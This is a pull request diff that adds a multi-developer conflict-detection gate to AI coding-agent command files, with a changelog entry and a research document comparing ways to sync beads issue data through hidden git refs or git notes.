### PR TITLE
feat: Multi-dev session awareness — conflict detection, parallel work visibility (#forge-w69s)

### DIFF
--- a/.claude/commands/dev.md
+++ b/.claude/commands/dev.md
@@ -76,6 +76,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.claude/commands/dev.md
+++ b/.claude/commands/dev.md
@@ -63,6 +63,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.claude/commands/plan.md
+++ b/.claude/commands/plan.md
@@ -50,6 +50,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.claude/commands/plan.md
+++ b/.claude/commands/plan.md
@@ -63,6 +63,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.claude/commands/status.md
+++ b/.claude/commands/status.md
@@ -16,6 +16,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/.cline/workflows/dev.md
+++ b/.cline/workflows/dev.md
@@ -60,6 +60,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.cline/workflows/dev.md
+++ b/.cline/workflows/dev.md
@@ -73,6 +73,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.cline/workflows/plan.md
+++ b/.cline/workflows/plan.md
@@ -47,6 +47,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.cline/workflows/plan.md
+++ b/.cline/workflows/plan.md
@@ -60,6 +60,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.cline/workflows/status.md
+++ b/.cline/workflows/status.md
@@ -13,6 +13,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/.codex/skills/dev/SKILL.md
+++ b/.codex/skills/dev/SKILL.md
@@ -76,6 +76,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.codex/skills/dev/SKILL.md
+++ b/.codex/skills/dev/SKILL.md
@@ -63,6 +63,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.codex/skills/plan/SKILL.md
+++ b/.codex/skills/plan/SKILL.md
@@ -50,6 +50,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.codex/skills/plan/SKILL.md
+++ b/.codex/skills/plan/SKILL.md
@@ -63,6 +63,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.codex/skills/status/SKILL.md
+++ b/.codex/skills/status/SKILL.md
@@ -16,6 +16,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/.cursor/commands/dev.md
+++ b/.cursor/commands/dev.md
@@ -60,6 +60,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.cursor/commands/dev.md
+++ b/.cursor/commands/dev.md
@@ -73,6 +73,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.cursor/commands/plan.md
+++ b/.cursor/commands/plan.md
@@ -47,6 +47,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.cursor/commands/plan.md
+++ b/.cursor/commands/plan.md
@@ -60,6 +60,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.cursor/commands/status.md
+++ b/.cursor/commands/status.md
@@ -13,6 +13,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/.forge/sync-manifest.json
+++ b/.forge/sync-manifest.json
@@ -1,5 +1,5 @@
 {
-  "generatedAt": "2026-03-22T00:21:13.253Z",
+  "generatedAt": "2026-03-22T01:06:38.461Z",
   "files": [
     ".cursor/commands/dev.md",
     ".cline/workflows/dev.md",

--- a/.forge/sync-manifest.json
+++ b/.forge/sync-manifest.json
@@ -1,5 +1,5 @@
 {
-  "generatedAt": "2026-03-22T01:06:38.461Z",
+  "generatedAt": "2026-03-22T02:51:42.956Z",
   "files": [
     ".cursor/commands/dev.md",
     ".cline/workflows/dev.md",

--- a/.github/prompts/dev.prompt.md
+++ b/.github/prompts/dev.prompt.md
@@ -65,6 +65,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.github/prompts/dev.prompt.md
+++ b/.github/prompts/dev.prompt.md
@@ -78,6 +78,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.github/prompts/plan.prompt.md
+++ b/.github/prompts/plan.prompt.md
@@ -52,6 +52,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.github/prompts/plan.prompt.md
+++ b/.github/prompts/plan.prompt.md
@@ -65,6 +65,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.github/prompts/status.prompt.md
+++ b/.github/prompts/status.prompt.md
@@ -18,6 +18,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/.kilocode/workflows/dev.md
+++ b/.kilocode/workflows/dev.md
@@ -64,6 +64,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.kilocode/workflows/dev.md
+++ b/.kilocode/workflows/dev.md
@@ -77,6 +77,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.kilocode/workflows/plan.md
+++ b/.kilocode/workflows/plan.md
@@ -64,6 +64,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.kilocode/workflows/plan.md
+++ b/.kilocode/workflows/plan.md
@@ -51,6 +51,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.kilocode/workflows/status.md
+++ b/.kilocode/workflows/status.md
@@ -17,6 +17,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/.opencode/commands/dev.md
+++ b/.opencode/commands/dev.md
@@ -76,6 +76,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.opencode/commands/dev.md
+++ b/.opencode/commands/dev.md
@@ -63,6 +63,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.opencode/commands/plan.md
+++ b/.opencode/commands/plan.md
@@ -50,6 +50,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.opencode/commands/plan.md
+++ b/.opencode/commands/plan.md
@@ -63,6 +63,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.opencode/commands/status.md
+++ b/.opencode/commands/status.md
@@ -16,6 +16,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/.roo/commands/dev.md
+++ b/.roo/commands/dev.md
@@ -64,6 +64,30 @@ Do NOT write any code until ALL confirmed:
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before starting the per-task loop, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with the current beads issue
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Per-Task Loop
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Per-Task Loop.
+
+---
+
 ## Per-Task Loop
 
 Repeat for each task in the task list, in order:

--- a/.roo/commands/dev.md
+++ b/.roo/commands/dev.md
@@ -77,6 +77,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.roo/commands/plan.md
+++ b/.roo/commands/plan.md
@@ -64,6 +64,8 @@ bash scripts/sync-utils.sh auto-sync
 bash scripts/conflict-detect.sh --issue <beads-id>
 ```
 
+If exit code 2 (validation error): show error message, abort — do not show conflict prompt.
+
 If exit code 1 (conflicts found):
 - Display the conflict output to the developer
 - Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"

--- a/.roo/commands/plan.md
+++ b/.roo/commands/plan.md
@@ -51,6 +51,30 @@ between parallel features or sessions.
 
 ---
 
+
+### Multi-developer conflict check (soft block)
+
+Before proceeding to Phase 1, check for cross-developer conflicts:
+
+```bash
+# Auto-sync to get latest team state
+bash scripts/sync-utils.sh auto-sync
+
+# Check for conflicts with this issue's planned work area
+bash scripts/conflict-detect.sh --issue <beads-id>
+```
+
+If exit code 1 (conflicts found):
+- Display the conflict output to the developer
+- Ask: "Other developers are working in overlapping areas. Proceed anyway? (y/n)"
+- If `n`: exit cleanly, no side effects
+- If `y`: log override via `bd comments add <id> "Conflict override: proceeding despite overlap with <conflicting-issues>"`, then continue to Phase 1
+- Audit: record conflict override per OWASP A09
+
+If exit code 0: proceed silently to Phase 1.
+
+---
+
 ## Phase 1: Design Intent (Brainstorming)
 
 **Goal**: Capture WHAT to build — purpose, constraints, success criteria, edge cases, approach.

--- a/.roo/commands/status.md
+++ b/.roo/commands/status.md
@@ -17,6 +17,13 @@ This command helps you understand the current state of the project before starti
 
 ## What This Command Does
 
+## Step 0: Sync team state
+
+```bash
+# Sync team state before showing status
+bash scripts/sync-utils.sh auto-sync
+```
+
 ### Step 1: Smart Status (ranked issues with conflict detection)
 ```bash
 bash scripts/smart-status.sh

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -11,6 +11,16 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Added
 
+- **Multi-dev session awareness: conflict detection, parallel work visibility** (PR #92, forge-w69s)
+  - Pluggable sync backend (`refs`/`branch`/`inline`) for cross-developer beads sync via git
+  - File index (`.beads/file-index.jsonl`) tracks which developer touches which files/modules
+  - Conflict detection script with module-level overlap warnings and `--detail` drill-down
+  - Cross-developer "Team Activity" section in `/status` with overlap and staleness warnings
+  - Soft-block gates on `/plan` and `/dev` entry when module overlap detected
+  - Auto-sync at Forge command entry pulls latest team state
+  - Session identity as `email@hostname`, sync branch auto-detection with config override
+  - 136 new shell tests across 5 test suites
+
 - **Smart Setup UX: agent detection, incremental setup, clean output** (PR #90, forge-iv8b)
   - 4-layer agent auto-detection: `AI_AGENT` env > agent-specific env vars > VSCode path parsing > config file signatures (8 agents)
   - Incremental setup: content-hash comparison skips identical files on re-run; `--force` flag for CI/overwrite

--- a/docs/plans/2026-03-22-beads-sync-ux-research.md
+++ b/docs/plans/2026-03-22-beads-sync-ux-research.md
@@ -1,0 +1,249 @@
+# Beads Sync UX Research: Git-Based Metadata Sync Across Multiple Developers
+
+**Date:** 2026-03-22
+**Context:** 5 developers, each with 2-3 parallel sessions. Need to sync `.beads/issues.jsonl` and `.beads/file-index.jsonl` across all developers so everyone sees what others are working on.
+**Goal:** Find the approach with the best developer UX — ideally "sync just works" without developers knowing.
+
+---
+
+## Approaches Ranked by Developer UX (Best to Worst)
+
+### Rank 1: Custom Hidden Refs (`refs/beads/*`) — The git-bug Pattern
+
+**How it works:** Store beads data as git objects (blobs/trees/commits) under a custom ref namespace `refs/beads/`. Configure refspecs so `git fetch` and `git push` automatically sync this namespace. Developers never see it in `git branch`, `git log`, or their working tree.
+
+**Prior art:**
+- **git-bug** (9.7k stars) stores bugs under `refs/bugs/<id>` — each bug is a chain of commits containing operation packs (JSON). Sync is `git bug push/pull` which maps to `git push/fetch` on the `refs/bugs/*` namespace. Uses Operation-based CRDTs with Lamport clocks for conflict-free merging.
+- **git-appraise** (5.3k stars, Google) stores code reviews under `refs/notes/devtools/*`. Each review item is a single line of JSON. Uses `cat_sort_uniq` merge strategy (sort lines, deduplicate) — perfectly suited for JSONL.
+
+**Merge conflicts:** Append-only JSONL + `cat_sort_uniq`-style merging = conflict-free by design. Each line is an independent record. Concurrent appends just concatenate and sort.
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 10/10 | Completely invisible. No new branches, no checkout switching, no merge conflicts in working tree. Data syncs with normal git operations if refspecs configured. |
+| Onboarding friction | 8/10 | Requires one-time `git config` to add refspec. Can be automated in `bunx forge setup`. New clones need the config. |
+| Merge conflict handling | 10/10 | JSONL + sort/dedup = zero conflicts. git-appraise proved this at Google scale. |
+| Compatibility | 10/10 | Works with any git workflow (git flow, trunk-based, forks). Refs are orthogonal to branches. |
+| Offline support | 10/10 | Full offline. Syncs on next push/fetch. |
+| Implementation complexity | 7/10 | Medium. Need to write git plumbing commands (hash-object, mktree, commit-tree, update-ref) in bash. ~100-150 lines. But git-bug's source code is a reference implementation. |
+
+**How to implement for beads:**
+```bash
+# Write: hash JSONL content into a blob, create tree, commit, update ref
+blob=$(git hash-object -w .beads/issues.jsonl)
+tree=$(printf "100644 blob $blob\tissues.jsonl\n" | git mktree)
+commit=$(git commit-tree $tree -m "beads sync" [-p $prev_commit])
+git update-ref refs/beads/data $commit
+
+# Sync: add refspec to git config (one-time setup)
+git config --add remote.origin.fetch '+refs/beads/*:refs/remotes/origin/beads/*'
+git config --add remote.origin.push '+refs/beads/*:refs/beads/*'
+
+# Read: extract data from ref
+git show refs/beads/data:issues.jsonl > .beads/issues.jsonl
+```
+
+**Key insight from git-appraise:** Storing each record as one line of JSON, then using `cat | sort | uniq` for merging, is a proven pattern that eliminates merge conflicts entirely for append-heavy data.
+
+---
+
+### Rank 2: Git Notes with Custom Ref (`refs/notes/beads`)
+
+**How it works:** Git notes are metadata blobs attached to commits. You can use a custom notes ref (`refs/notes/beads`) to store arbitrary data. Notes have built-in merge strategies including `cat_sort_uniq`.
+
+**Prior art:** git-appraise uses exactly this — `refs/notes/devtools/reviews`, `refs/notes/devtools/ci`, etc.
+
+**Merge conflicts:** Built-in `cat_sort_uniq` strategy in `git notes merge`. Set via `notes.beads.mergeStrategy = cat_sort_uniq`.
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 9/10 | Nearly invisible. Notes don't appear in working tree. But notes are per-commit (attached to a specific commit), which is a conceptual mismatch — beads data isn't about specific commits. |
+| Onboarding friction | 7/10 | Need refspec config AND `notes.displayRef` config. Notes aren't fetched by default — must add `+refs/notes/beads:refs/notes/beads` to fetch refspec. |
+| Merge conflict handling | 9/10 | Built-in `cat_sort_uniq` is perfect for JSONL. Slight edge case: notes are per-commit, so if two developers annotate different commits, data is fragmented. |
